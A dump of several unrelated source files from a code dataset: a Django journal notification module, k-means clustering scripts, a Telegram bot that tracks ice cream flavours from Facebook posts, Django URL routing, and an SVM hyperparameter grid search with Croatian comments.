review_logic.get_review_url(\n request,\n review_assignment,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n reviewer_context = context\n reviewer_context['review_url'] = review_url\n editor_context = context\n editor_context['review_in_review_url'] = review_in_review_url\n\n # send to slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n if accepted:\n context[\"reviewer_decision\"] = _(\"accepted\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_accept_acknowledgement',\n 'subject_review_accept_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n else:\n context[\"reviewer_decision\"] = _(\"declined\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_decline_acknowledgement',\n 'subject_review_decline_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n # send to editor\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'reviewer_acknowledgement',\n 'subject_reviewer_acknowledgement',\n editor.email,\n editor_context,\n )\n\n\ndef send_submission_acknowledgement(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it\n notifies site operators of a submission. It is\n wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes article and request\n :return: None\n \"\"\"\n\n article = kwargs['article']\n request = kwargs['request']\n\n util_models.LogEntry.add_entry(\n types='Submission Complete',\n description='A new article {0} was submitted'.format(article.title),\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': 'A new article {0} was submitted'.format(article.title),\n 'types': 'New Submission Acknowledgement',\n 'target': article,\n }\n\n # generate URL\n review_unassigned_article_url = request.journal.site_url(\n path=reverse(\n 'review_unassigned_article',\n kwargs={'article_id': article.pk},\n )\n )\n notify_helpers.send_slack(\n request,\n 'New submission: {0} {1}'.format(\n article.title,\n review_unassigned_article_url,\n ),\n ['slack_editors'])\n\n # send to author\n context = {\n 'article': article,\n 'request': request,\n 'review_unassigned_article_url': review_unassigned_article_url,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_acknowledgement',\n 'subject_submission_acknowledgement',\n article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n\n # send to all editors\n editors_to_email = setting_handler.get_setting(\n 'general', 'editors_for_notification', request.journal).processed_value\n\n if editors_to_email:\n editor_pks = [int(pk) for pk in editors_to_email]\n editor_emails = {\n role.user.email for role in core_models.AccountRole.objects.filter(\n role__slug='editor',\n user__id__in=editor_pks,\n )\n }\n else:\n editor_emails = set(request.journal.editor_emails)\n\n assigned_to_section = (\n article.section.editors.all() | article.section.section_editors.all())\n\n editor_emails |= {editor.email for editor in assigned_to_section}\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'editor_new_submission',\n 'subject_editor_new_submission',\n editor_emails,\n context,\n log_dict=log_dict,\n custom_reply_to=[f\"noreply{settings.DUMMY_EMAIL_DOMAIN}\"]\n )\n\n\ndef send_article_decision(**kwargs):\n article = kwargs['article']\n request = kwargs['request']\n decision = kwargs['decision']\n subject = \"\"\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s article \"{1}\" has been {2}ed by {3}'.format(article.correspondence_author.full_name(),\n article.title,\n decision,\n request.user.full_name())\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Article Decision',\n 'target': article}\n\n if decision == ED.ACCEPT.value:\n subject = 'subject_review_decision_accept'\n elif decision == ED.DECLINE.value:\n subject = 'subject_review_decision_decline'\n elif decision == ED.UNDECLINE.value:\n subject = 'subject_review_decision_undecline'\n\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n subject,\n article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_revisions_request(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0} has requested revisions for {1} due on {2}'.format(\n request.user.full_name(),\n revision.article.title,\n revision.date_due,\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Revision Request',\n 'target': revision.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_request_revisions',\n revision.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_revisions_complete(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n action_text = ''\n for action in revision.actions.all():\n action_text = \"{0}
\n\n# In[4]:\n\n\ndef init_centroids(a,k):\n centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n num = np.random.randint(0,np.shape(a)[1])\n centroids[:,i] = a[:,num]\n centroids[4,i] = i\n a[4,num] = i\n return centroids\n\n\n# #
Computer new centroids
\n\n# In[5]:\n\n\ndef new_centroids(a,k):\n new_centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n new_centroids[:,i] = np.mean(a[:,a[4,:]==i],axis = 1)\n print(np.shape(new_centroids))\n return new_centroids\n\n\n# #
Compute distance to centroids & assign labels
\n\n# In[6]:\n\n\nfrom scipy.spatial.distance import cdist as cd\n\ndef distance(a,centroids):\n index2 = np.shape(centroids)[1]\n temp = np.zeros((1,index2))\n print(np.shape(a))\n for i in range(0,np.shape(a)[1]):\n temp = cd([a[0:4,i].transpose()],centroids[0:4,:].transpose(),metric = 'euclidean')\n closest_centroid = np.argmin(temp)\n temp2 = centroids[:,closest_centroid]\n a[:,i] = temp2\n return a\n\n\n# In[7]:\n\n\nnum_centroids = 24\nX_temp = np.zeros((5,409960))\ncentroids = init_centroids(X,num_centroids)\nX_temp = distance(X,centroids)\nfor i in range(0,1):\n centroids_new = new_centroids(X_temp,num_centroids)\n centroids = centroids_new\n X_temp = distance(X_temp,centroids)\n \n\n\n# In[8]:\n\n\nimport scipy.misc\n\nr = X_temp[0,:]\ng = X_temp[1,:]\nb = X_temp[2,:]\nr = r.reshape(740,554)\ng = g.reshape(740,554)\nb = b.reshape(740,554)\nrgb = np.dstack((r*255,g*255,b*255))\n\nscipy.misc.imsave('rgb.jpg',rgb)\nimage = Image.open('rgb.jpg')\nimgplot = plt.imshow(image)\nplt.show()\n\n","repo_name":"shubham2604/MachineLearning","sub_path":"Python_codes/Image_compression_using_k_means.py","file_name":"Image_compression_using_k_means.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"93316100","text":"import Statics\nimport random as ran\n\nclass kmeans():\n def __init__(self, initializationMethod):\n self.initializationMethod = initializationMethod\n\n def main(self, k):\n assignedCluster = []\n newCentroids = []\n\n # Calculate initial centroids\n if self.initializationMethod == \"plus\":\n initialCentroids = self.initializePlus(k)\n elif self.initializationMethod == \"normal\":\n initialCentroids = self.initializeClusters(k)\n elif self.initializationMethod == \"spread\":\n initialCentroids = self.initializeSpread(k)\n\n # adjust centroids by iteration, stop when finished or max iterations\n for num in range(0, Statics.maxIterations):\n #TODO: how to copy elements?\n assignedCluster [:] = [] #delete values in list\n assignedCluster [:] = self.assign_Centroid(initialCentroids, k)\n newCentroids [:] = [] #delete values in list\n newCentroids [:] = self.recalculate_Centroids(assignedCluster, k)\n # recognizing natural finish point\n if initialCentroids == newCentroids:\n break;\n\n if num==Statics.maxIterations:\n assignedCluster [:] = self.assign_Centroid(newCentroids, k)\n\n initialCentroids [:] = list(newCentroids)\n\n return newCentroids, assignedCluster\n\n\n # initializes k centroids\n # picks random data points as initial centroids\n def initializeClusters(self, k):\n centroids = [];\n for cluster in range(0, k):\n ch = ran.choice(Statics.data)\n centroids.append(ch)\n return centroids\n\n def initializePlus(self, k):\n centroids = [];\n centroids.append(ran.choice(Statics.data))\n\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n totalDistance = 0\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances [:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick the nearest cluster for the current data point\n minDistances.append([Statics.data.index(datapoint), min(distances)])\n totalDistance += min(distances)\n\n # Fill a cummulative list, 0 to 1, with appropiate probabilities, which is used to pick the new centroid by weighted probability\n cumProbabilities = []\n previousProb = 0\n for minDistance in minDistances:\n probability = (minDistance[1]/totalDistance) * 100\n if minDistance == minDistances[0]:\n cumProbabilities.append([minDistance[0], probability])\n else:\n cumProbabilities.append([minDistance[0], previousProb + probability])\n previousProb += probability\n\n r = ran.uniform(0.0, 100.0)\n for cumProbability in cumProbabilities:\n if r < cumProbability[1]:\n centroids.append(Statics.data[cumProbability[0]])\n break\n\n return centroids\n\n # Picks points as far away from each other as possible as initial clusters\n def initializeSpread(self, k):\n centroids = []\n\n # Get minimum values for all dimensions and use these as first centroid\n minimumValues = []\n for dataPoint in Statics.data:\n if dataPoint == Statics.data[0]:\n for dimension in range(0, len(dataPoint)):\n minimumValues.append(dataPoint[dimension])\n else:\n for dimension in range(0, len(dataPoint)):\n if dataPoint[dimension] < minimumValues[dimension]:\n minimumValues[dimension] = dataPoint[dimension]\n centroids.append(minimumValues)\n\n # Calculate all distances from data points to their nearest cluster\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for each data point\n distances = []\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances[:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick closest cluster for the current data point\n minDistances.append(sum(distances))\n\n # Select the data point of which its nearest cluster is the furthest away, and use this as the new centroid\n centroids.append(Statics.data[minDistances.index(max(minDistances))])\n\n return centroids\n\n def calculate_LDistance (self, currentData, currentCentroid, lNorm):\n return pow(sum([pow(abs(currentData - currentCentroid),lNorm) for currentData, currentCentroid in zip(currentData, currentCentroid)]),(1/lNorm))\n\n def calculate_ChebyshevDistance (self, currentData, currentCentroid):\n return max([abs(currentData - currentCentroid) for currentData, currentCentroid in zip(currentData, currentCentroid)])\n\n # assigns data points to the nearest centroid\n def assign_Centroid(self, centroids, k):\n distance = []\n cluster = []\n j=0\n while (j None:\n username = update.effective_user.username\n if username in data:\n context.bot.sendMessage(text=already_registered, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n data[username] = User(username=username)\n write_data_to_file(data)\n context.bot.sendMessage(text=successfully_registered, chat_id=update.effective_user.id)\n\n\ndef configure(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/configure\", \"\").lstrip()\n if not token:\n return\n data.get(username).page_url = token\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Updated subscribed shop.\", chat_id=update.effective_user.id)\n\n\ndef add(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/add\", \"\").lstrip()\n if not token:\n return\n if token.lower() not in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.append(token.lower())\n write_data_to_file(data)\n message = str(\"Now watching out for: {}\").format(token.capitalize())\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n\n\ndef remove(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n message = update.message.text.replace(\"/remove\", \"\").lstrip()\n if not message:\n return\n if message.lower() in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.remove(message.lower())\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Removed {}\".format(message.capitalize()), chat_id=update.effective_user.id)\n\n\ndef post(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_post() is not None:\n context.bot.sendMessage(text=get_post(), chat_id=update.effective_user.id)\n\n\ndef list_flavors(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(data.get(username).ice_cream_flavors) > 0:\n message: str = \"\"\n for flavor in data.get(username).ice_cream_flavors:\n message += flavor.capitalize() + \"\\n\"\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=watching_no_flavors, chat_id=update.effective_user.id)\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n\n\ndef get_update(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_available_message(username) is not None:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=get_available_message(username))\n\n\ndef start_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) != 0:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=\"Already subscribed to notifications.\")\n return\n time = datetime.time(10, 20, 00)\n args = {\"username\": username,\n \"chat_id\": update.message.chat_id}\n context.job_queue.run_daily(\n callback=notify_job,\n time=time,\n days=tuple(range(7)),\n context=args,\n name=username)\n context.bot.sendMessage(text=\"You'll get notified at {} UTC.\".format(time.isoformat(timespec=\"minutes\")),\n chat_id=update.effective_user.id)\n\n\ndef stop_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) == 0:\n context.bot.sendMessage(text=\"You are not subscribed to notifications yet.\", chat_id=update.effective_user.id)\n return\n context.job_queue.get_jobs_by_name(username)[0].schedule_removal()\n context.bot.sendMessage(text=\"You'll not get notified any longer.\", chat_id=update.effective_user.id)\n\n\ndef notify_job(context):\n if get_available_message(context.job.context.get(\"username\")) is not None:\n context.bot.sendMessage(chat_id=context.job.context.get(\"chat_id\"),\n text=get_available_message(context.job.context.get(\"username\")))\n\n\ndef get_available_message(username: str) -> str or None:\n if username not in data:\n return None\n post = get_post()\n available_flavors: list[str] = list()\n user: User = data.get(username)\n for flavor in user.ice_cream_flavors:\n if user.page_url.casefold() == \"both\".casefold():\n if flavor.casefold() in post.casefold():\n available_flavors.append(flavor)\n elif \"Lindenhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Lindenhof((?:.|\\s)*?)Limburgerhof\", post,\n flags=re.IGNORECASE).group(1) \\\n or \"Limburgerhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Limburgerhof((?:.|\\s)*?)$\", post, flags=re.IGNORECASE).group(1):\n available_flavors.append(flavor)\n if len(available_flavors) > 0:\n return \"The following flavors are available today: {}\".format(', '.join(available_flavors))\n\n\ndef get_post() -> str:\n date_today = datetime.date.today()\n cache_date = cache[\"cache_date\"]\n cache_text = cache[\"cache_text\"]\n if cache_date is not None and cache_date == date_today:\n return cache_text.casefold()\n else:\n posts = get_posts(\"eismanufakturzeitgeist\", pages=1, cookies=config['Cookies']['path-to-cookies'])\n for post in posts:\n if post['time'].date() == date_today:\n cache[\"cache_text\"] = post['text']\n cache[\"cache_date\"] = date_today\n return cache[\"cache_text\"].casefold()\n\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(config['Telegram']['bot-token'])\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"add\", add))\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\n dispatcher.add_handler(CommandHandler(\"list\", list_flavors))\n dispatcher.add_handler(CommandHandler(\"configure\", configure))\n dispatcher.add_handler(CommandHandler(\"update\", get_update))\n dispatcher.add_handler(CommandHandler(\"post\", post))\n dispatcher.add_handler(CommandHandler(\"start_notify\", start_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"stop_notify\", stop_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"help\", help))\n\n # on non command i.e message - echo the message on Telegram\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RatzzFatzz/zeitgeist-notifier","sub_path":"src/facebook_notifier.py","file_name":"facebook_notifier.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3668436398","text":"#-*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom perso.views import create_error_view\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^namegen/', include(\"namegen.urls\")),\n url(r'^dynimg/', include(\"dynimg.urls\")),\n url(r'^playel/', include(\"playel.urls\")),\n url(r'^profs/', include(\"profs.urls\")),\n url(r'^avatar/', include(\"avatar.urls\")),\n url(r'^quotes/', include(\"quotes.urls\")),\n url(r'^register/', include(\"register.urls\")),\n url(r'^blog/', include(\"perso.urls\")),\n url(r'^', include(\"portfolio.urls\")),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\nhandler400 = create_error_view(code=400)\nhandler403 = create_error_view(code=403)\nhandler404 = create_error_view(code=404)\nhandler500 = create_error_view(code=500)\n","repo_name":"crazy-djactor/LMinaw","sub_path":"leminaw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"72152699847","text":"\"\"\"\nTreći dio: Support Vector Machine\nPotrebno je provesti pretraživanje po rešetki nad hiperparametrima C i gamma kako bi se dobile optimalne vrijednosti\nza sve setove podataka. Očekuje se da će oni biti malo drugačiji za različite setove.\nC - dozvoljena pogreška klasifikacije; obrnuto proporcionalna jačina regularizacije lambda, C=1/lambda\ngamma - koef. jezgre za rbf, poly i sigmoidalnu funkciju.\nAnaliza će se provjeriti posebno za 3 jezgrene funkcije: rbf, poly i linear.\nNa kraju će se rezultati zapisati u excel datoteke posebno za svaki set podataka, u svakoj za sve 3 jezgrene funkcije.\n\n\"\"\"\n\n\nfrom Preprocessing import input_data, output_data\n# Ukoliko se žele stvarati novi podaci svaku skriptu, ovo NE treba biti zakomentirano\nfrom Preprocessing import divided_train_data, all_X_test_data\n\nimport openpyxl, pickle, os, shutil\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\n\noutput_SVM = output_data+\"C_SVM/\"\n\nwith open(input_data+'/divided_train_data.pickle', 'rb') as f_X_train:\n divided_train_data = pickle.load(f_X_train)\nwith open(input_data+'/all_X_test_data.pickle', 'rb') as f_test:\n all_X_test_data = pickle.load(f_test)\n\ntry:\n shutil.rmtree(output_SVM)\nexcept:\n FileNotFoundError\nos.mkdir(output_SVM)\n\n\n# Velika SVM funkcija koja računa točnost za rbf, poly i linear jezgrene funkcije z sve data setove\ndef grid_search(data_name, X_train, Y_train, X_valid, Y_valid):\n\n # Pomoćna funkcija koja ispisuje koliko je gotovo simulacija od ukupnog broja\n def current_sim_number(c,gamma, C_range, gamma_range):\n m = C_range.index(c)\n n = gamma_range.index(gamma) # indexi trenutnog položaja\n\n num = n * len(C_range) + m +1 # number of simulation\n percentage_over = num / (len(C_range) * len(gamma_range))\n percentage_over_str = (str(num) + \"/\" + str(len(C_range) * len(gamma_range)))\n print(percentage_over_str)\n return percentage_over\n\n\n # Postavljanje hiperparametara i excel datoteke za spremanje pretraživanja\n xlsx_name = output_SVM+\"Acc_SVM_\"+data_name+\".xlsx\" # ime excel file u koji se spremaju rezultati, kasnije\n Acc_grid_search = pd.ExcelWriter(xlsx_name) # stvaranje excela\n C_range = range(-10, -3) # rang baze za C\n gamma_range = range(-20, -5)\n C_f = lambda m: 2 ** m # Funkcije za računanje C i gamma\n gamma_f = lambda n: 2 ** n\n best_grid_acc = {\"radial_base\":[], \"poly\":[], \"linear\":[]}\n\n\n # SVM s radijalnom baznom funkcijom\n def radial_base_function():\n accuracity_matrix = {}\n max_acc = 0 # inicijalno postavljanje najbolje točnosti i array-project_data pozicija\n\n for gamma_ in gamma_range: # Pretraživanje za jedan red (C=..)\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = [] # Rezultati se spremaju u matricu\n\n for c_ in C_range: # Pretraživanje za jedan stupac (gamma=..)\n svcModel = SVC(C=C_f(c_), kernel=\"rbf\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"radial_base\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n best_grid_acc[\"radial_base\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n current_sim_number(c_, gamma_, C_range, gamma_range) # ispisuje gotove simulacije\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range] # imena indexa DataFrame-project_data, gamma=.. podaci\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n\n # Redovi su vrijednosti C, kolone vrijednosti gamma\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"radial_base\", startcol=0, startrow=0)\n\n radial_base_function()\n\n\n\n # Polinomijalna bazna funkcija\n def poly_function():\n C_range_poly = range(-15, -5)\n gamma_range_poly = range(-15, -5)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_poly:\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = []\n\n for c_ in C_range_poly:\n svcModel = SVC(C=C_f(c_), kernel=\"poly\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n current_sim_number(c_, gamma_, C_range_poly, gamma_range_poly)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"poly\"] = [[n_C, n_gamma]]\n\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n best_grid_acc[\"poly\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_poly]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"poly\", startcol=0, startrow=0)\n\n poly_function()\n\n\n\n\n def linear_function():\n gamma_range_linear = [1]\n C_range_linear = range(-15, -3)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_linear:\n accuracity_matrix[1] = []\n\n for c_ in C_range_linear:\n svcModel = SVC(C=C_f(c_), kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n accuracity_matrix[1].append([acc_train, acc_valid])\n current_sim_number(c_, gamma_, C_range_linear, gamma_range_linear)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"linear\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n best_grid_acc[\"linear\"].append([n_C, n_gamma])\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_linear]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"linear\", startcol=0, startrow=0) # Redovi su vrijednosti C, kolone vrijednosti gamma\n\n linear_function()\n\n\n Acc_grid_search.save() # Spremanje DF u excel file\n workbook=openpyxl.load_workbook(xlsx_name)\n\n # Otvara sve sheetove ovisno o rječniku gdje su spremljeni podaci\n for kernel_function in best_grid_acc.keys(): # iterira riječnik sa svim podacima točnosti\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).value = \"C/gamma\" # ispis u ćeliju\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).fill = \\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FFFF00\") # bojanje oznaka gamma, C\n\n # Iteracija po zapisanim koordinatama gdje se nalazi maksimalna točnost modela\n for position in best_grid_acc[kernel_function]:\n workbook.get_sheet_by_name(kernel_function).cell(row=2+position[0], column=2+position[1]).fill =\\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FF0000\")\n\n workbook.save(xlsx_name)\n\n\n####################################################################################################################\n\n# Iteracija po svim podacima spremljenim u pickle\nfor data_name in divided_train_data[\"X_train_data\"]:\n\n X_train = divided_train_data[\"X_train_data\"][data_name]\n Y_train = divided_train_data[\"Y_train_data\"][data_name]\n X_valid = divided_train_data[\"X_valid_data\"][data_name]\n Y_valid = divided_train_data[\"Y_valid_data\"][data_name]\n\n grid_search(data_name, X_train, Y_train, X_valid, Y_valid) # provodi cijelu analizu i izbacuje excel\n\n\n\n\n####################################################################################################################\n\n\n\n\n\n\n\"\"\"\nZaključak:\n\n - Model s početnim vrijenostima hiperparametara pokazuje najveću točnost za RBF jezgrenu funkciju. Daljnim \n podešavanjem hiperparametara moguće je postići veću točnost i za druge jezgre. Negativna stvar je da za \n veće vrijednosti hiperparametara modeli osjetno sporije konvergiraju te je potreban kompromis. \n \n\n -Nakon provedene analize zaključuje se da su veće vrijednosti hiperparametara optimalne (C=100, gamma=) te su \n također i stabilnije i ustaljene točnosti. C=1, gamma=1 su vrijednosti hiperparametara za koje model s \n osnovnim podacima ima općenito najveću točnost. \n \n -Rezultati pravilno konvergiraju rješenju kada se vrijednosti hiperparametara mijenjaju po kvadratnoj funkciji.\n \n -Modeli s drugim podacima i funkcijama imaju istu maksimalnu točnost, ALI se do nje može brže doći promjenom HP.\n -> pogotovo kod korištenja poly jezgrene funkcije\n \n -Vjerojatno se točnost kod poly modela može još malo podići uz dosta veću računalnu zahtjevnost - neisplativo\n\n\n\n\n # za čiste podatke odabrano:\n 0.5 / 0.125 - teško točno pogoditi jer se mijenjaju od seta do seta podataka\n\n # poly4: stabilniji rezultati\n 0.25/3e-6\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n# Funkcija koja ispisuje tablicu s koeficijentima korelacije (vaćnost svake kategorije za predviđanje)\ndef SVC_coeffs():\n\n X_train = divided_train_data[\"X_train_data\"][\"X\"]\n Y_train = divided_train_data[\"Y_train_data\"][\"X\"]\n X_valid = divided_train_data[\"X_valid_data\"][\"X\"]\n Y_valid = divided_train_data[\"Y_valid_data\"][\"X\"]\n\n # svcModel = SVC(C=0.5, kernel=\"rbf\", gamma=0.125)\n svcModel = SVC(C=33, kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n # acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n # prediction = svcModel.predict(X_valid)\n # acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n\n\n coeff_df = pd.DataFrame(X_train.columns)\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(svcModel.coef_[0])\n coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n coeff_df = coeff_df.reset_index(drop=True)\n\n print(coeff_df)\n\n return coeff_df\n\n\nSVC_coeffs()\n\n\n # coeff_df = pd.DataFrame(train_X.columns)\n # coeff_df.columns = ['Feature']\n # coeff_df[\"Correlation\"] = pd.Series(svc.coef_[0])\n # coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n # coeff_df = 